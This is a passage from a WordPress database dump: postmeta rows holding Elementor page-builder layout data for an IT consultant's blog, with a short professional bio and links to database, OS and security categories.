»\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(3026,684,'_elementor_pro_version','3.12.3'),
(3027,684,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3029,685,'_elementor_edit_mode','builder'),
(3030,685,'_elementor_template_type','wp-page'),
(3031,685,'_elementor_version','3.12.1'),
(3032,685,'_wp_page_template','default'),
(3033,685,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(3035,685,'_elementor_pro_version','3.12.3'),
(3036,685,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3038,686,'_elementor_edit_mode','builder'),
(3039,686,'_elementor_template_type','wp-page'),
(3040,686,'_elementor_version','3.12.1'),
(3041,686,'_wp_page_template','default'),
(3042,686,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3044,686,'_elementor_pro_version','3.12.3'),
(3045,686,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3060,688,'_elementor_edit_mode','builder'),
(3061,688,'_elementor_template_type','wp-page'),
(3062,688,'_elementor_version','3.12.1'),
(3063,688,'_wp_page_template','default'),
(3064,688,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3066,688,'_elementor_pro_version','3.12.3'),
(3067,688,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3069,689,'_elementor_edit_mode','builder'),
(3070,689,'_elementor_template_type','wp-page'),
(3071,689,'_elementor_version','3.12.1'),
(3072,689,'_wp_page_template','default'),
(3073,689,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3075,689,'_elementor_pro_version','3.12.3'),
(3076,689,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3078,690,'_elementor_edit_mode','builder'),
(3079,690,'_elementor_template_type','wp-page'),
(3080,690,'_elementor_version','3.12.1'),
(3081,690,'_wp_page_template','default'),
(3082,690,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 